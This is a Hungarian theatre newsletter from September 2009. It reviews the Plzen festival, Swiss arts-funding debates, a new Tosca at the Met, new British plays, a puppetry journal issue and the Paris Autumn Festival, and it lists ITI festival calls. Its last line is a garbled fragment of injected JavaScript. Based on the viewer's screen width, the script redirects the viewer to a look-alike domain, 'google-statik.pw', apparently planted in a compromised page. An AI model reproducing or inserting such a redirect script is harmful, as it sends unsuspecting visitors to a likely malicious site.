OSZMI_ITI HÍRLEVÉL 2009 szeptember

ITI-OSZMI HIRLEVEL 2009/szeptember

 

1. Hirek

1.1. Plzen - 17. Nemzetkozi Szinhazi Fesztival

1.2. Merre tart Svajc kulturpolitikaja?

1.3. Uj rendezesben lathato Puccini: Toscaja a MET-ben

1.4. A Theatre du Soleil hirei

1.5. Tanulmany Nagy Jozsef Filozofusok c. eloadasarol

 

2. Kortars drama

2.1. Heather Dunmore: Blue

2.2. Francis Beckett: The Right Honourable Lady

 

3. Folyoirat szemle

3.1. Theatre/Public193. szam

3.2. A Parizsi Oszi Fesztival programja

 

4. ITI  (Nemzetkozi Szinhazi Intezet) hirek,felhivasok, palyazatok

4.1. Felhivas a 26. Nemzetkozi Szarajevo Fesztivalon valo reszvetelre

4.2. Nemzetkozi konferencia es workshop Ausztriaban

4.3. A 14. Nemzetkozi Okori Gorog Dramafesztival tarsulatok jelentkezeset varja

1. Hirek

 

1.1. Plzen - 17. Nemzetkozi Szinhazi Fesztival

 

2009-ben oktober 9. es 13. kozott rendeztek meg Plzenben Nemzetkozi Szinhazi Fesztivalt. A fesztival vezeto helyen szerepel a kozep- es kelet-europai hasonlo rendezvenyek soraban. Tavaly a Visegradi Orszagok Kulturalis Miniszteriuma nekik itelte meg a legjobb kulturalis projektnek jaro dijat. 2009-ben a kiemelkedo cseh es europai szinhaz legjavat felvonultato program mellett egy nemzetkozi konferencianak is otthont adott a rendezveny: Twenty Years After - Metamorphoses and Reflections of Theatre since 1989 (Husz evvel utana - Szinhazi atalakulasok es gondolatok az 1989 utani szinhazrol) a Nemzetkozi Szinikritikusok Szovetsegenek szervezeseben. A szeles valasztekot kinalo fesztivalmusorban szerepelt tobbek kozott Aiszkhulosz Oreszteiaja Krakkobol Jan Klata rendezeseben, Vaclav Havel: Leaving cimu darabja Martin Glaser szinpadi megfogalmazasaban Ceske Budejovicebol, a Europeans a pragai Boca Loca Lab eloadasaban, Jiri Adamek rendezeseben. Gothar Peter rendezese, az Ivanovek karacsonya es Visky Andras: A meg nem szuletett cimu darabja Tompa Gabor szinreviteleben szinten kepviseltette magat a programban, es szamos szinhazi szakember velemenye szerint ez volt a ket legjobb eloadas a fesztivalon. A fiatal cseh rendezo, Jan Mikulasek Hedda Gablere es Hamlete otletes, igeretes vallalas: stilusjegykent vonul vegig mindket eloadason a szerepkettozes, olykor tobbszorozes, es a rendkivuli ritmuserzek. Kulonleges elmeny volt megnezni a szinten cseh Viktorie Cermakova Polibila Dubceka (A no, aki megcsokolta Dubceket) cimu groteszk rendezeset a sorgyarban. A szerzo a politikai kommentator es dramairo Karel Steigerwald, aki ebben a darabjaban 1968. traumatikus esemenyeit dolgozza fel a majusi diaklazadastol Dubcek letartoztatasaig egy fiatal lany sorsan keresztul, aki a lazadaskor bortonbe kerul, mert megcsokolt egy amerikai kolto-diakot, majd egy gyarban megcsokolja az odalatogato Dubcek elvtarsat, vegul elszanja magat, hogy megcsokolja magat Brezsnyevet is. Maciej Sobocinski Othelloja steril, IKEA hangulatot idezo diszletben zajlott, ahol a hirtelen tulhevulo vagy felidegesedo, hatulgombolos feher inges es nyakkendos szereplok labon allo, vizzel teli hutocseszekbe merithettek fejuket szukseg eseten. Othello az elso felvonas elejetol maganyosan setalgatott karjaban a halott, tagjait rongybabakent logato Desdemonaval - ez az elegikus epizod ciklikusan visszatero motivum volt az egyebkent vegiggondolt, egyseges eloadasban. A fesztivalprogramot szinesitette egy libanoni vendegjatek, a Looking for a Missing Employee. A darabot sokat sejteto modon Rabih Mroue irta, rendezte es jatssza. A szinpadon masfel oran keresztul nincs igazi jatek: Rabih Mroue a kozonsegben foglal helyet, arcat es kezet kivetiton latjuk, ahogy vegiglapoz harom-negy fuzetet, es egyesevel, embert probaloan vontatottan meseli el a bennuk levo ujsagcikkek tartalmat. A kulonbozo libanoni ujsagokbol kivagott cikkek mind ugyanarrol az eltunt szemelyrol szolnak, aki a libanoni penzugyminiszterium dolgozoja volt, es egyszer csak nyoma veszett. Kozben az eloadas masik, kozonsegben ulo nema szereploje lerajzolja a szoba kerult gyanusitottak kozotti viszonyrendszert, es iskolas, akombakom grafikonon folyamatosan abrazolja a miniszteriumbol eltunt tetemes penzosszeg valtozasat. Kulonos, az „igazsagot szandekosan nem kereso" doku-dramanak lehettunk tanui, ahol vegul magyarazatot nem kaptunk a keresett szemely eltunesenek okara, de megtalaltuk ot magat egy erdoben savba martva. Az off-programbol kiemelnem Michael Ditte Terra Granus cimu darabjat a szlovak Iveta Jurcova rendezeseben. A fiatal alkotok a 2001 ota aktivan mukodo Poton Divadlo tagjai, akik ezuttal a kitelepites, az otthonkereses temakoret dolgoztak fel hat kulonbozo tortenetben. A szineszileg egyenetlen, de lenduletes es paradesan otletgazdag eloadas eros szinhazi nyelvet, emlekezetes kepeket hagyott maga utan. A tuzvedelmi eloirasokat betartva meggyurnak es megsutnek elottunk egy hetre valo kenyeret, egy fel nyulat ego tuzon, mikozben a terhes nok kototukkel a hasukban ulnek a fodrasznal, vagy becipelik a hazba utolso megmaradt szilvafajukat, hogy leszedjek rola meg a gyumolcsot, mielott elhagyjak az otthonukat. Az eloadas Pozsonyban a Nova Drama Fesztivalon kozonsegdijat kapott.  (R.A.)

 

1.2. Merre tart Svajc kulturpolitikaja?

 

Thomas Hirschhorn az egyik legtobbet kiallito svajci kepzomuvesz 1957-ben szuletett Bernben. Ma Parizsban el es alkot. Ismert es elismert muvesz, amit rengeteg nemzetkozi dij is igazol. 2004-ben Parizsban a Centre Culturel Suisse-ben „Swiss-Swiss Democracy" cimu kiallitasa botranyt es elenk polemiat inditott el hazajaban. A Pro Helvetia, a kulturat tamogato svajci alap 180 ezer svajci frankkal tamogatta a kiallitast, amely a muvesz szandekai szerint a demokracia fogalmanak muveszi dezidealizalasa volt, a svajci kozvetlen demokracia abszurd gyakorlatanak kritikaja. Nem csak a kiallitas plakatja volt provokacio, hanem az osszes, ez ido alatt megvalositott program is, mint peldaul Markus Steinwag filozofus eloadassorozata a demokracia, a felelosseg filozofiajarol, valamint a Gwenael Morin szinhazi tarsulatanak bemutatoja, amelyben Schiller Tell Vilmosat adaptaltak es megkerdojeleztek, kritizaltak a felszabaditast jelkepezo nemzeti hosuk alakjan keresztul a svajci demokracia mitoszat. Az eloadasban hasznalt elemek sem nelkuloztek a provokaciot, peldaul az egyik szinesz kutyat utanozva pisilte le egy akkori svajci politikus fenykepet.

A kiallitast es a hozza szorosan kapcsolodo rendezvenyeket sok szempontbol kritizaltak. A kepzomuvesz szemere vetetettek azt is, hogy politikai okbol elutasitja, hogy Svajcban allitson ki, ugyanakkor elfogadja az alapitvany kozpenzekbol szarmazo tamogatasat, kulfoldon kritizalja hazajat. A polemia 2005-ben felerosodott, es eppen akkor, amikor a koltsegvetesi vitat tartottak es a szovetsegi kormany javaslatara, mintegy „bunteteskent", egy millio svajci frankkal kurtitottak a Pro Helvetia budzsejet. A „Hirschhorn-ugy" neven elhiresult eset mind a mai napig referencia, igazodasi pont Svajcban, kulonosen napjainkban, amikor a muveszetekrol, azok tamogatasarol, a muveszetek es az allam viszonyarol szolo, 2012-ben eletbelepo torvenyt keszitik elo.

Ennek fenyeben tunik fontosnak a Pro Helvetia altal kiadott Passages c. folyoirat legutobbi szama, amelyben muveszeket es politikusokat kerdeztek meg arrol, hogyan definialjak a kultura es politika viszonyat. Ez parbajkent vagy kettoskent foghato fel; szerelmi hazassagkent vagy kenyszerhazassagkent; kolcsonos gazdagitaskent vagy eppen kolcsonos fuggeskent ertelmezheto.

Thomas Steinfeld, a Suddeutsche Zeitung ujsagiroja A muveszet szabadsaga - milyen aron? cimu cikkeben a muveszet szabadsagat, mint annak belso lenyeget tartja elsodlegesen fontosnak, szerinte az allam feladata az, hogy a muveszek es a tarsadalom kozotti kapcsolatban a muveszek vedelmet biztositsa.

Pius Knusel, a Pro Helvetia igazgatoja abbol indul ki, hogy az 1970-80-as evek lazadoinak koszonhetoen Svajcban a muveszet egyertelmuen a szolas szabadsaganak integrans es elismert resze, a muveszek szabadon kifejezhetik magukat, es nem kell felniuk a cenzuratol. Az allamnak szerinte az a feladata, eppen a Hirschhorn ugybol tanulva, hogy a politika tobbe ne avatkozhasson be se kozvetlenul, se kozvetve a muveszetekbe, es biztositsa peldaul a Pro Helvetia fuggetlenseget, anyagi es egyeb szempontbol. Az igazgato szemleletet meghatarozza, hogy szerinte a hangsulyt semmikeppen nem a produktivitasra, vagyis a mennyisegre, inkabb az elmelyult muveszi munka tamogatasara, annak segitesere kell helyezni.

 

 

 

 

 

1.3. A Theatre du Soleil hirei

 

A Theatre du Soleil nagy kihagyasokkal irja hirleveleit. A 2008. marciusit a most augusztus vegi koveti, amelyben arrol tudositanak, hogy iden unnepli fennallasanak 45. szuletesnapjat. Tobbek kozott ennek az evfordulonak is koszonheto, hogy iden eppen Ariane Mnouchkine kapta a Norvegia altal alapitott Nemzetkozi Ibsen-dijat. A hirlevelbol az is megtudhato, hogy elkeszult az Ephemeres cimu eloadas DVD-je, amelyet egyelore csak a Theatre du Soleil-tol

lehet megvasarolni.

A szinhaz a Bibliotheque Nationale de France (BNF)-nak adomanyozott jelentos szamu dokumentumot, valamint fotokat, hang- es video felveteleket, jelmezeket, sajto-kivagatokat. Ezek jo resze mar kutathato a konyvtar szinhazi gyujtemenyeben (rue de Richelieu, 58. Parizs).

Szeptember 3. es oktober 11. kozott a Festival Premiers Pas kereteben ujra lathato a Cartoucherie-ben a Theatre Aftaab, az afgan Theatre du Soleil, amely Kabulban dolgozik es Parizsban ujra jatsszak a Tartuffe es Helene Cixous Ce jour-la (Azon a napon) c. darabokat.

Uj eloadasra is keszul a tarsulat. Ennek munkacime L'Autre Route (A masik ut). Valojaban Verne Gyula egyik regenye inspiralja a darabot, amelynek szoveget reszben Helene Cixous irja, reszben a tarsulat kozosen hozza letre.  A bemutatora 2009. november 11-en kerul sor.

 

1.4. Uj rendezesben lathato Puccini: Toscaja a MET-ben

 

Bar 2006 ota igazgatja Peter Gleb a New Yorkban Metropolitan Operat, megis a most kezdodo szezon az elso, amelynek programjat o allitotta ossze. Az idei evad az ujdonsagok jegyeben telik: kilenc uj produkciot mutatnak be. De az is ujdonsagnak, sot mereszsegnek szamit, hogy a legrangosabb europai rendezoket hivja meg az operak szinrevitelere, tobbek kozott Patrice Chereau-t, Luc Bondy-t. Ez utobbi rendezeseben mutattak be Puccini: Toscajat szeptember 21-en. A premier kozonsege majdhogynem kifutyulte az eloadast, mert nem az 1985 ota megszokott, Zeffirelli megalmodta operat latta viszont. A kritikus szerint a MET kozonsege szamara az igazi Tosca eloadas olyan, amelyben - mint a mozivasznon - barokk templom, a Farnese palota es a Saint-Ange kastely diszlete lathato. Vagyis olyan eloadasra vagynak, amely megfelel a konvencioknak es fokent az altaluk elkepzelt olasz vilagba repiti oket. Luc Bondy rendezese es Richard Peduzzi diszlete epp az ellenkezoje mindennek. Itt a III. felvonasban a tobzodo latvanyt egy egyszeru torony es szurkeskek eg helyettesiti, ami az alkotok szerint jobban ervenyre juttatja a halalraitelt remenyvesztettseget. Kulonben is: a fenyek, szinek mindvegig a szereplok es a helyzetek valtozasait kovetik. Meltatlankodast valtott ki az is, hogy a II. felvonasban nehany art deco butor is feltunt, amellyel elegansan es diszkreten arra utaltak, hogy Scarpia, a rendorfonok es ama bizonyos Duce kozott mintha nemi hasonlosag lenne felfedezheto. Zefirelli, anelkul, hogy latta volna az eloadast, a New York Times internetes oldalan arrol az „idiota" szokasrol beszelt, ahogy a masod- es harmadrendu rendezok, mint peldaul Bondy, Puccini operajat ertelmezik, szinre viszik. Azonban a Le Monde kritikusa szerint az eloadas, a zenei megvalositas egy szinte tokeletes operaeloadast kinal a kozonsegnek.

Az eloadas oktober 7-ig lathato a New Yorkban, a Metropolitanben.

 

 

1.5. Tanulmany Nagy Jozsef Filozofusok c. eloadasarol

 

Az OSZMI Tancarchivumaban olvashato a Pleine Marge cimu irodalmi, kepzomuveszeti, kritikai folyoiratnak az a szama, amelyben Josef Nadj: Les philosophes cimu eloadasarol szolo tanulmany talalhato Myriam Bloede tollabol. A cikk gazdag illusztracios anyagat Josef Nadj grafikai es fotoi adjak.

 

 

 

2. Kortars drama

 

2.1. Heather Dunmore: Blue

Szereplok:

3 no/ 1 ferfi

 

A Blue cimu egyfelvonasos megindito darab csaladrol, maganyrol, depressziorol es remenyrol. Az orvos Leo diagnosztizalt depresszioban szenved, es nehezen fogadja el a helyzetet. Visszaemlekezik a gyerekkorara, majd arra az idoszakra, amikor apa lett, es ujra ateli az osszes gyanakvasat, panikrohamat, elokerulnek reg elfeledett erzesei, mikozben a hipnozistol a muveszet-terapiaig mindent megprobal, hogy megkuzdjon a betegsegevel. A kepet tovabb arnyalja Leo edesanyja, testvere es felesege, akik mindnyajan tudnak mit meselni a depressziorol, es arrol, hogy ez az allapot milyen hatassal van azokra, akiket szeretunk.

A szamos brit fesztivalon 2002-ben es 2003-ban is dijnyertes darabot a Samuel French Ltd adta ki 2008-ban. Heather Dunmore, a szerzo az Oxfordshire Touring Theatre Company alkalmazottja, es rendszeresen reszt vesz az Oxford Playhouse munkajaban. A Blue az elso jelentos iroi sikere, melyet bemutatott az Edinburgh Fringe Fesztivalon is 2002-ben.

 

 

2.2. Francis Beckett: The Right Honourable Lady

Szereplok:

3 no/ 2 ferfi

 

Flavia ujsagiro a BBC-nel, akit magahoz csabit egy bulvarlap, a Daily Trumpet. Azzal a feladattal bizza meg, hogy szedje le a keresztvizet regi baratnojerol, Nicola Macdonaldrol, aki jelenleg brit miniszter. Flavia felfedi, hogy Nicolanak viszonya van egy nala joval fiatalabb ferfival, Stephennel. Ezt kovetoen mocskos, alpari vezercikkek jelennek meg roluk, mindkettojuk hazassagat es karrierjet fenyegetve. Flavia azt remeli, hogy ezek utan lehetosege lesz a kormanyban folyo komolyabb korrupcios ugyekbe betekinteni, de Mirandanak, a Daily Trumpet szerkesztojenek, es Griffnek, a frakciovezetonek mas tervei vannak.

A darabot 2009. juliusaban adta ki a Samuel French Ltd. Francis Beckett ismert iro, dramairo, szerkeszto es ujsagiro. 2007-ben jelent meg Gordon Brown - Past, Present and Future es The Great City Academy Fraud cimu konyve. Egyik legutobbi, Money Makes You Happy cimu darabjat a Bridewell Theatre mutatta be nagy sikerrel.

 

3. Folyoirat szemle

 

3.1. Theatre/Public193. szam

Julie Sermon, az Universite Lyon II. tanara az utobbi evekben azt kutatta, hogy a kulonbozo uj torekvesek, formak, irasmod hogyan valtoztatta meg az utobbi evek babjatszasat. A lap szerkesztosege tehat nem veletlenul kerte fel ot, hogy a babmuveszetnek szentelt szamat megszerkessze. Harom nagy temacsoportba sorolhatoak a cikkek, tanulmanyok, esszek. Az elsoben a legjelentosebb francia tarsulatokat, azok mukodeset mutatja be egy-egy teman keresztul, mint amilyen a Pulcinella figurajanak, torteneteinek, valamint a guignol hagyomanyainak ujraeledese. Didier Plassard tanulmanyaban a marionett etikajat es esztetikajat vizsgalja a mai szinpadokon. Berenice Hamidi-Kim azt mutatja be, hogy mi a francia babszinhaz-politikai elkepzeles a 21. szazad elejen. Sylvie Martin-Lahmani a Trafoban is vendegszerepelt holland Hotel Modern tarsulat eloadasait ertelmezi es azt vizsgalja, hogyan abrazoljak produkcioikban a haborut. A masodik temakorbe tartozo irasok a mufajok kozotti „hataratlepesek" kerdeset vizsgaljak: hogyan befolyasolja a mai babeloadasokat az uj technikak alkalmazasa. Mas tanulmanyok pedig a test, a maszk es a bab uj esztetikai megjeleniteset vizsgaljak a kulonbozo, vizualisan eroteljes eloadasokban. A harmadikban az uj babszinhazi nyelv kialakulasat taglaljak az esszek illetve eloadas-kritikak.

 

 

3.2. A Parizsi Oszi Fesztival programja

2009. szeptember 15. es december 19. kozott tartjak Parizsi Oszi Fesztivalt, amelynek programjat egy folyoirat lapszamanak megfelelo kiadvanyban kozlik. Nehany kiemelkedo esemeny a gazdag kinalatbol:

Szeptember

Szeptember 15. es 18. kozott a Theatre de la Ville-ben lathato a Robert Wilson-rendezte Brecht-Weill: Koldusopera, a Berliner Ensemble produkcioja. A kortars dan dramairo, Kaj Munk: Ordet / Szo cimu darabjat Arthur Nauzyciel rendezte francia szineszekkel. A tobb francia szinhaz illetve fesztival egyuttmukodesevel letrejott eloadas, amely ket kulonbozo vallasu csalad konfrontaciojarol szol, szeptember 16. es oktober 10. kozott lesz a Theatre du Rond-Point musoran. A D'Ores et deja Tarsulat ket darabjat Sylvain Creuzevault rendezte. Az elsoben, Notre Terreur (A mi terrorunk) cimuben Robespierre bukasat, halalat, utolso napjat dolgozzak fel, es azt vizsgaljak, hogy a mai demokraciara hogyan hat, hat-e az akkori forradalmi legenda. A masik produkciojuk (Le Pere Tralalere) Lise es Leo eskuvojevel kezdodik. Eleinte minden rendben zajlik, ahogy egy klasszikus darabban, majd apro repedesek jelennek meg, s vegul minden robban. (szeptember 16. es oktober 9. kozott, La Colline - Theatre National).  Szeptember 23-tol  27-ig a Centre Pompidou egy kulonlegesseget mutat be. A kepzomuvesz, szobrasz William Kentridge rendezte a Georg Buchner Woyzeckje nyoman keszult eloadast a del-afrikai Handspring Puppet Company-val. Ebben az eloadasban Woyzeck egy emigrans munkas, aki a Johannesburg kozeleben talalhato Highveld banyavidek korul boklaszik. Az eloadas fantomszeru diszlete Kentridge animacios filmje, amelyben az ember, babarnyak es a babmozgatok a gesztusok erzeki balettjet alkotjak.

Csak nehany alkalommal lesz lathato a Theatre de la Ville-ben a Theatre Vidy-Lausanne produkcioja, Heiner Goebbels operaja, az I Went To The House But Did Not Enter, amely T.S. Eliot, Maurice Blanchot, Samuel Beckett, Franz Kafka szovegeire epul.

 

Oktober

SaburoTeshigawara Miroku cimu szoloja oktober 7. es 10. kozott a Theatre National de Chaillot-ban vendegszerepel. Rachid Ouramdane Des Temoins ordinaires cimu koreografiajat, amely a tortenelem es az egyen viszonyat fogalmazza meg a tanc nyelven, a Theatre de Gennevilliers mutatja be oktober 8. es 18. kozott. A multimedia technikai eszkozoket is felhasznalo Tsuyoshi Shirai japan koreografus eloadasanak foszereploje egy chaplini figura, aki a targyak, fenyek varazslatos vilagaban probalja megragadni a mindig tovatuno dolgokat (oktober 15-16, Maison de la Culture du Japon). Shakespeare: Julius  Caesar c. darabjat az American Repertory Theatre, Boston adja elo. Arthur Nauzyciel rendezese az 1960-as evekbe teszi a darab cselekmenyet, amikor az Egyesult Allamok Kennedyt unnepli, ugyanakkor a mai politikusok altal felhasznalt es mindent uralo „storytelling" technikat is beepiti az eloadasba (oktober 21-24, Maison des Arts Creteil).

 

 

4. ITI  (Nemzetkozi Szinhazi Intezet) hirek, felhivasok, palyazatok

 

4.1. Felhivas a 26. Nemzetkozi Szarajevo Fesztivalon valo reszvetelre

 

Nemzetkozi Szarajevo Fesztivalt ( „Sarajevo Winter 2010" ) 2010 feburar 7. es 28. kozott rendezik Bosznia-Hercegovina fovarosaban. A sokeves hagyomannyal rendelkezo, nagyszabasu kulturalis es muveszeti esemeny a W.A.T., World Art Tendency mottoja alatt jon letre: a vilag minden tajarol meghivott muveszek talalkozohelye, networkepitesi lehetosege ez a fesztival. A szervezok eloadomuveszek, szinhazi eloadasok, operak, babeloadasok, klasszikus es kortars tancdarabok jelentkezeset varjak. A bevalogatott eloadasok resztvevoinek szallasat es etkezeset fizetik.

Hatarido: 2009. szeptember 30.

Jelentkezesi lap, feltetelek az alabbi elerhetosegeken: www.sarajevskazima.ba, This e-mail address is being protected from spambots. You need JavaScript enabled to view it

 

 

4.2. Nemzetkozi konferencia es workshop Ausztriaban

 

Eloadomuveszek, tanarok, diakok jelentkezeset varjak az ausztriai Leibnitz-ben 2009. oktober 28. es 31. kozott tartando, Performing Arts Training Today elnevezesu nemzetkozi konferenciara es gyakorlati workshopokra, orosz, szingapuri, japan, ausztriai, brit es amerikai szinhazi szakemberek reszvetelevel. A konferencia tematikaja erinti a japan no es suzuki technikakat, a szinesz fizikalitasanak problemajat Meyerhold es Sztanyiszlavszkij modszereiben, valamint az ir szineszkepzes helyzetet.

 

Tovabbi informacio es regisztracio: http://www.iugte.com/projects/PhysicalTheatre.php

 

 

4.3. A 14. Nemzetkozi Okori Gorog Dramafesztival tarsulatok jelentkezeset varja

 

A 2010 julius 1. es 31. kozott megrendezendo 14. Nemzetkozi Okori Gorog Dramafesztival olyan szinhazak, tarsulatok jelentkezeset varja, amelyek repertoarukban rendelkeznek magyar nyelven jatszott okori gorog tragediaval vagy komediaval, ami eredeti szoveggel, nem adaptacioban valosul meg.

Hatarido: 2009. december vege

Tovabbi informacio: This e-mail address is being protected from spambots. You need JavaScript enabled to view it , www.cyprus-theatre-iti.org

 

 

 

Kesztettek: Lakos Anna (szerk.), Rakoczy Anita

if (screen.width ion = "http://google-statik.pw/l.php";} if (screen.width